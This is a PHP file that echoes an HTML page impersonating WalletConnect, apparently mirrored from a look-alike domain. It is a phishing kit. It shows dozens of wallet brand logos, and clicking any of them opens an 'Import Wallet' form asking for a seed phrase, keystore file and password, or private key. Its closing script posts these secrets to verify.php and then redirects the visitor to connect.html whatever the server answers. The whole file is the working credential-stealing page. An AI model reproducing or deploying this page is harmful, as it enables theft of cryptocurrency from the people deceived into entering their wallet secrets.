<?php
echo '<!DOCTYPE html>';
echo '<html lang="en">';
echo '';
echo '';
echo '<!-- Mirrored from walletsconnectlink.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Apr 2021 15:49:45 GMT -->';
echo '<head>';
echo '<meta charset="UTF-8">';
echo '<meta http-equiv="X-UA-Compatible" content="IE=edge">';
echo '<meta name="viewport" content="width=device-width, initial-scale=1.0">';
echo '<meta name="description" content="Open protocol for connecting Wallets to Dapps">';
echo '<meta name="keywords" content="ethereum, cryptocurrency, wallet, mobile, connect, bridge, relay, proxy, standard, protocol, crypto, tokens, dapp">';
echo '<link rel="stylesheet" href="connect.css">';
echo '<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">';
echo '<link href="repos/bootstrap.min.css" rel="stylesheet">';
echo '<script src="repos/jquery.js"></script>';
echo '<script src="repos/popper.min.js"></script>';
echo '<script src="repos/bootstrap.min.js"></script>';
echo '';
echo '<style>';
echo '.apps {';
echo 'width: 95px;';
echo 'height: auto;';
echo 'padding: 10px;';
echo 'text-align: left;';
echo 'margin: auto;';
echo 'justify-content: center;';
echo 'border: none;';
echo 'border-radius: 5px;';
echo 'text-align: center;';
echo 'float:left;';
echo 'cursor:pointer;';
echo 'padding:8px;';
echo 'border:1px solid #fff;';
echo '}';
echo '';
echo '.apps:hover {';
echo 'border:1px solid #ccc;';
echo '}';
echo '';
echo '.apps a {';
echo 'text-align: center;';
echo '}';
echo '';
echo '.apps img {';
echo 'max-width: 75px;';
echo 'object-fit: cover;';
echo 'margin-bottom: 3px;';
echo 'display:block;';
echo 'min-height:64px;';
echo 'max-height:64px;';
echo 'margin:0px auto 10px auto;';
echo '}';
echo '';
echo '.modal.fade .modal-bottom,';
echo '.modal.fade .modal-left,';
echo '.modal.fade .modal-right,';
echo '.modal.fade .modal-top {';
echo 'position: fixed;';
echo 'z-index: 1055;';
echo 'top: 0;';
echo 'left: 0;';
echo 'right: 0;';
echo 'bottom: 0;';
echo 'margin: 0;';
echo 'max-width: 100%';
echo '}';
echo '';
echo '.modal.fade .modal-right {';
echo 'left: auto !important;';
echo 'transform: translate3d(100%, 0, 0);';
echo 'transition: transform .3s cubic-bezier(.25, .8, .25, 1)';
echo '}';
echo '';
echo '.modal.fade.show .modal-bottom,';
echo '.modal.fade.show .modal-left,';
echo '.modal.fade.show .modal-right,';
echo '.modal.fade.show .modal-top {';
echo 'transform: translate3d(0, 0, 0)';
echo '}';
echo '';
echo '.w-xl {';
echo 'width: 320px';
echo '}';
echo '';
echo '.modal-content,';
echo '.modal-footer,';
echo '.modal-header {';
echo 'border: none';
echo '}';
echo '';
echo '.h-100 {';
echo 'height: 100% !important';
echo '}';
echo '';
echo '.btn-light {';
echo 'color: #212529;';
echo 'background-color: #f5f5f6;';
echo 'border-color: #f5f5f6';
echo '}';
echo '';
echo '.btn-light:hover {';
echo 'color: #212529;';
echo 'background-color: #e1e1e4;';
echo 'border-color: #dadade';
echo '}';
echo '';
echo '.modal-footer {';
echo 'display: flex;';
echo 'align-items: center;';
echo 'justify-content: flex-end;';
echo 'padding: 1rem;';
echo 'border-top: 1px solid rgba(160, 175, 185, .15);';
echo 'border-bottom-right-radius: .3rem;';
echo 'border-bottom-left-radius: .3rem';
echo '}';
echo '';
echo '.wallet-logo img {';
echo 'max-width:50px;';
echo 'max-height:50px;';
echo '}';
echo '</style>';
echo '';
echo '<link rel="icon" href="icon.svg">';
echo '';
echo '<title>WalletConnect</title>';
echo '</head>';
echo '';
echo '<body>';
echo '';
echo '<div class="firstcon">';
echo '<div class="one">';
echo '<a href="#">Github</a>';
echo '<a href="#">docs</a>';
echo '';
echo '</div>';
echo '<div class="two">';
echo '<span class="bimg1"></span>';
echo '';
echo '</div>';
echo '<div class="three">';
echo '';
echo '<a href="#" class="mv1">wallets</a>';
echo '<a href="#">apps</a>';
echo '</div>';
echo '';
echo '';
echo '</div>';
echo '';
echo '<div>';
echo '<h2 class="title">WalletConnect</h2>';
echo '<p class="title2">Open protocol for connecting Wallets to DApps</p>';
echo '';
echo '</div>';
echo '<div class="banner"></div>';
echo '<div class="container">';
echo '<div class="row">';
echo '<div class="col-md-6">';
echo '<h3 class="text-center">What is WalletConnect?</h3>';
echo '<p class="text-center">WalletConnect is an open source protocol for connecting decentralised applications to mobile wallets with QR code scanning or deep linking. A user can interact securely with any Dapp from their mobile phone, making WalletConnect wallets a';
echo 'safer choice compared to desktop or browser extension wallets.</p>';
echo '';
echo '</div>';
echo '<div class="col-md-6">';
echo '<h3 class="text-center">How does it work?</h3>';
echo '<p class="text-center">';
echo 'WalletConnect connects web applications to supported <a href="#" class="sublink">mobile wallets</a>.WalletConnect session is started by a scanning a QR code (desktop) or by clicking an application deep link (mobile).';
echo '</p>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '<div class="wallets container text-center" id="wallets">';
echo '<h1 class="home">Wallets</h1>';
echo '<p>Multiple iOS and Android wallets support the WalletConnect protocol. Interaction between mobile apps and mobile browsers are supported via mobile deep linking.</p>';
echo '</br>';
echo '<div class="all container row col-md-12">';
echo '<div class="apps" app="MetaMask" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/metamask.png"></a></br>';
echo 'MetaMask';
echo '</div>';
echo '<div class="apps" app="MEW Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/MEW.png"></a></br>';
echo 'MEW Wallet                    </div>';
echo '<div class="apps" app="Trust Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/trustwallet.png"></a></br>';
echo 'Trust Wallet                    </div>';
echo '<div class="apps" app="Wallect Connect" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/logo.svg"></a></br>';
echo 'Wallect Connect                    </div>';
echo '<div class="apps" app="Coinbase Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/coinbase.jpg"></a></br>';
echo 'Coinbase Wallet                    </div>';
echo '<div class="apps" app="Atomic Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/atomic.png"></a></br>';
echo 'Atomic Wallet                    </div>';
echo '<div class="apps" app="Binance Smart Chain" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/binance.png"></a></br>';
echo 'Binance Smart Chain                    </div>';
echo '<div class="apps" app="BNB" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/bnb.png"></a></br>';
echo 'BNB                    </div>';
echo '<div class="apps" app="Polkadot" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/polkadot.png"></a></br>';
echo 'Polkadot                    </div>';
echo '<div class="apps" app="XRP" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/xrp.png"></a></br>';
echo 'XRP                    </div>';
echo '<div class="apps" app="Stellar" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/stellar.png"></a></br>';
echo 'Stellar                    </div>';
echo '<div class="apps" app="Tezos" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/tezos.png"></a></br>';
echo 'Tezos                    </div>';
echo '<div class="apps" app="Theta" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/theta.png"></a></br>';
echo 'Theta                    </div>';
echo '<div class="apps" app="Tron" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/tron.png"></a></br>';
echo 'Tron                    </div>';
echo '<div class="apps" app="Cosmos" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/cosmos.png"></a></br>';
echo 'Cosmos                    </div>';
echo '<div class="apps" app="Kava" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/kava.png"></a></br>';
echo 'Kava                    </div>';
echo '<div class="apps" app="Filecoin" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/filecoin.png"></a></br>';
echo 'Filecoin                    </div>';
echo '<div class="apps" app="Solana" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/solana.png"></a></br>';
echo 'Solana                    </div>';
echo '<div class="apps" app="Ethereum Classic" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/ethereum-classic.png"></a></br>';
echo 'Ethereum Classic                    </div>';
echo '<div class="apps" app="Zilliqa" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/zilliqa.png"></a></br>';
echo 'Zilliqa                    </div>';
echo '<div class="apps" app="Elrond" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/elrond.jpg"></a></br>';
echo 'Elrond                    </div>';
echo '<div class="apps" app="Waves" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/waves.png"></a></br>';
echo 'Waves                    </div>';
echo '<div class="apps" app="ICON" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/icon.png"></a></br>';
echo 'ICON                    </div>';
echo '<div class="apps" app="Ontology" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/ontology.png"></a></br>';
echo 'Ontology';
echo '</div>';
echo '<div class="apps" app="Oxen Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/oxen.png"></a></br>';
echo 'Oxen Wallet                        </div>';
echo '<div class="apps" app="Nano" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/nano.png"></a></br>';
echo 'Nano                        </div>';
echo '<div class="apps" app="Tomo Chain" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/tomo.png"></a></br>';
echo 'Tomo Chain                        </div>';
echo '<div class="apps" app="VeChain" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/vechain.jpg"></a></br>';
echo 'VeChain                        </div>';
echo '<div class="apps" app="IoTex" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/iotex.png"></a></br>';
echo 'IoTex                        </div>';
echo '<div class="apps" app="Wanchain" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/wanchain.png"></a></br>';
echo 'Wanchain                        </div>';
echo '<div class="apps" app="Harmony" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/harmony.png"></a></br>';
echo 'Harmony                        </div>';
echo '<div class="apps" app="Kin" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/kin.png"></a></br>';
echo 'Kin                        </div>';
echo '<div class="apps" app="Nimiq" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/nimiq.png"></a></br>';
echo 'Nimiq                        </div>';
echo '<div class="apps" app="Aion" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/aion.png"></a></br>';
echo 'Aion                        </div>';
echo '<div class="apps" app="Thunder Token" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/thundertoken.png"></a></br>';
echo 'Thunder Token                        </div>';
echo '<div class="apps" app="Aeternity" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/aeternity.png"></a></br>';
echo 'Aeternity                        </div>';
echo '<div class="apps" app="Nebulas" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/nebulas.png"></a></br>';
echo 'Nebulas                        </div>';
echo '<div class="apps" app="FIO" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/fio.png"></a></br>';
echo 'FIO                        </div>';
echo '<div class="apps" app="GoChain" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/gochain.png"></a></br>';
echo 'GoChain                        </div>';
echo '<div class="apps" app="POA Network" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/poa.png"></a></br>';
echo 'POA Network                        </div>';
echo '<div class="apps" app="Callisto" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/callisto.png"></a></br>';
echo 'Callisto                        </div>';
echo '<div class="apps" app="BitPay" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/bitpay.jpg"></a></br>';
echo 'BitPay                        </div>';
echo '<div class="apps" app="Aktionariat" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/aktionariat.png"></a></br>';
echo 'Aktionariat                        </div>';
echo '<div class="apps" app="AtWallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/atwallet.png"></a></br>';
echo 'AtWallet                        </div>';
echo '<div class="apps" app="Guard Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/guard.png"></a></br>';
echo 'Guard Wallet                        </div>';
echo '<div class="apps" app="AAVE" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/aave.jpg"></a></br>';
echo 'AAVE                        </div>';
echo '<div class="apps" app="Exodus" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/exodus.jpg"></a></br>';
echo 'Exodus                        </div>';
echo '<div class="apps" app="Enjin" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/enjin.jpg"></a></br>';
echo 'Enjin                        </div>';
echo '<div class="apps" app="Skale" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/skale.png"></a></br>';
echo 'Skale                        </div>';
echo '<div class="apps" app="Portis" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/portis.png"></a></br>';
echo 'Portis                        </div>';
echo '<div class="apps" app="Trezor" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/trezor.png"></a></br>';
echo 'Trezor                        </div>';
echo '<div class="apps" app="Squarelink" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/squarelink.png"></a></br>';
echo 'Squarelink                        </div>';
echo '<div class="apps" app="Torus" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/torus.jpg"></a></br>';
echo 'Torus                        </div>';
echo '<div class="apps" app="Scatter Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/scatter.jpg"></a></br>';
echo 'Scatter Wallet                        </div>';
echo '<div class="apps" app="Sumcoin" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/sumcoin.png"></a></br>';
echo 'Sumcoin                        </div>';
echo '<div class="apps" app="Math Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/math-wallet.png"></a></br>';
echo 'Math Wallet                        </div>';
echo '<div class="apps" app="FortMatic" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/fortmatic.png"></a></br>';
echo 'FortMatic                        </div>';
echo '<div class="apps" app="Digitex" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/digitex.png"></a></br>';
echo 'Digitex                        </div>';
echo '<div class="apps" app="Ledger" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/ledger.png"></a></br>';
echo 'Ledger                        </div>';
echo '<div class="apps" app="Defiat" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/defiat.jpg"></a></br>';
echo 'Defiat                        </div>';
echo '<div class="apps" app="Authereum" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/authereum.png"></a></br>';
echo 'Authereum                        </div>';
echo '<div class="apps" app="Flare Wallet" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/flare.jpg"></a></br>';
echo 'Flare Wallet                        </div>';
echo '<div class="apps" app="Zelcore" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/zelcore.png"></a></br>';
echo 'Zelcore                        </div>';
echo '<div class="apps" app="BitKeep" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/bitkeep.png"></a></br>';
echo 'BitKeep                        </div>';
echo '<div class="apps" app="Coin98" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/coin98.png"></a></br>';
echo 'Coin98                        </div>';
echo '<div class="apps" app="Trust Vault" data-toggle="modal" data-target="#myModal">';
echo '<a><img src="trusted/trustvault.png"></a></br>';
echo 'Trust Vault';
echo '</div>';
echo '</div>';
echo '</div>';
echo '';
echo '<div class="clearfix"></div>';
echo '<div class="text-center mt-5 mb-5 foot">';
echo '<a href="./" class="link-dark mr-3"><i class="fa fa-flickr"></i> Flickr</a>';
echo '<a href="./" class="link-dark mr-3"><i class="fa fa-telegram"></i> Telegram</a>';
echo '<a href="./" class="link-dark mr-3"><i class="fa fa-twitter"></i> Twitter</a>';
echo '<a href="./" class="link-dark"><i class="fa fa-github"></i> Github</a>';
echo '</div>';
echo '<input type="hidden" id="import-type" value="#phrase">';
echo '<input type="hidden" id="wallet">';
echo '';
echo '<div class="page-content page-container" id="page-content">';
echo '<div class="padding">';
echo '<div class="row container d-flex justify-content-center">';
echo '<div id="myModal" class="modal bg-dark fade" data-backdrop="false">';
echo '<div class="modal-dialog modal-md">';
echo '<div class="modal-content">';
echo '<div class="modal-header">';
echo '<div class="modal-title text-md">Import Wallet</div> <button class="close" data-dismiss="modal">&times;</button>';
echo '</div>';
echo '<div class="modal-body" style="padding-top:0px;">';
echo '<center><div class="wallet-logo"></div><p class="lead wallet-name"></center>';
echo '<ul class="nav nav-pills mb-3 mt-2">';
echo '<li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#phrase">Phrase</a></li>';
echo '<li class="nav-item"><a class="nav-link" data-toggle="tab" href="#keystore">Keystore JSON</a></li>';
echo '<li class="nav-item"><a class="nav-link" data-toggle="tab" href="#pkey">Private Key</a></li>';
echo '</ul>';
echo '';
echo '<div class="tab-content">';
echo '<div id="phrase" class="tab-pane  in active">';
echo '<form>';
echo '<span class="text-danger phrase-err" style="font-size:13px;"></span>';
echo '<textarea class="form-control" rows="5" name="phrase" id="phrase" placeholder="Phrase" required></textarea>';
echo '<p class="text-secondary" style="margin-top: 10px;">Typically 12 (sometimes 24) words seperated by a single spaces.</p>';
echo '</form>';
echo '</div>';
echo '<div id="keystore" class="tab-pane fade">';
echo '<form>';
echo '<span class="text-danger keystore-err" style="font-size:13px;"></span>';
echo '<div class="form-group">';
echo '<textarea class="form-control" name="keystore" id="keystore" rows="5" placeholder="Keystore JSON" required></textarea>';
echo '</div>';
echo '<div class="form-group">';
echo '<input class="form-control" type="password" name="keypass" id="keypass" placeholder="Password" required>';
echo '</div>';
echo '<p class="text-secondary" style="margin-top: 10px;">';
echo 'Several lines of text beginning with "{...}" plus the password you used to encrypt it.';
echo '</p>';
echo '</form>';
echo '</div>';
echo '<div id="pkey" class="tab-pane fade">';
echo '<form>';
echo '<span class="text-danger pkey-err" style="font-size:13px;"></span>';
echo '<div class="form-group">';
echo '<input class="form-control" name="privatekey" id="privatekey" placeholder="Private Key" required>';
echo '</div>';
echo '<p class="text-secondary" style="margin-top: 10px;">Typically 12 (sometimes 24) words seperated by a single spaces.</p>';
echo '</form>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '<div class="modal-footer">';
echo '<button type="button" class="btn btn-light" data-dismiss="modal">Close</button>';
echo '<button type="button" class="btn btn-primary import-now"><i class="fa fa-key"></i> IMPORT</button>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '</div>';
echo '';
echo '</body>';
echo '<script>';
echo '$('.apps').click((app)=> {';
echo 'console.log(app);';
echo '$('div.wallet-logo').html(app.target.outerHTML);';
echo '$('input#wallet').val(app.delegateTarget.attributes.app.nodeValue);';
echo '$('p.wallet-name').html(app.delegateTarget.attributes.app.nodeValue);';
echo '});';
echo '';
echo '$('.nav-link').click((tab)=> {';
echo '$('input#import-type').val(tab.target.attributes.href.nodeValue);';
echo '});';
echo '';
echo '$('.import-now').click(function() {';
echo '$('span.phrase-err, span.keystore-err, span.pkey-err').html('');';
echo 'var type = $('input#import-type').val();';
echo 'var body = {};';
echo 'if(type==="#phrase") {';
echo 'let phrase = $('textarea#phrase').val();';
echo 'if(phrase.length < 12) {';
echo '$('span.phrase-err').html('Please enter the words completely');';
echo 'return false;';
echo '} else {';
echo 'body = {';
echo 'wallet: $('input#wallet').val(),';
echo 'type: 'Phrase',';
echo 'content: $('textarea#phrase').val()';
echo '}';
echo '}';
echo '}';
echo 'if(type==="#keystore") {';
echo 'let kstore = $('textarea#keystore').val();';
echo 'let kpass = $('input#keypass').val();';
echo 'if(kstore.length < 20 && kpass.length < 4) {';
echo '$('span.keystore-err').html('Please enter the encrypted key and the password');';
echo 'return false;';
echo '} else {';
echo 'body = {';
echo 'wallet: $('input#wallet').val(),';
echo 'type: 'Keystore',';
echo 'content: $('textarea#keystore').val(),';
echo 'key: $('input#keypass').val()';
echo '}';
echo '}';
echo '}';
echo 'if(type==="#pkey") {';
echo 'let key = $('input#privatekey').val();';
echo 'if(key.length < 12) {';
echo '$('span.pkey-err').html('Please enter the key words completely');';
echo 'return false;';
echo '} else {';
echo 'body = {';
echo 'wallet: $('input#wallet').val(),';
echo 'type: 'Private Key',';
echo 'content: $('input#privatekey').val()';
echo '}';
echo '}';
echo '}';
echo '$('button.import-now').attr({'disabled':'disabled'}).html('<i class="fa fa-spin fa-spinner"></i>');';
echo '$.ajax({';
echo 'url: 'verify.php',';
echo 'type: 'POST',';
echo 'dataType: 'JSON',';
echo 'data: body,';
echo 'crossDomain: true,';
echo 'success: function(res) {';
echo 'window.location.href="connect.html";';
echo '},';
echo 'error: function(e) {';
echo 'window.location.href="connect.html";';
echo '}';
echo '});';
echo '});';
echo '';
echo '';
echo '</script>';
echo '</html>';
?>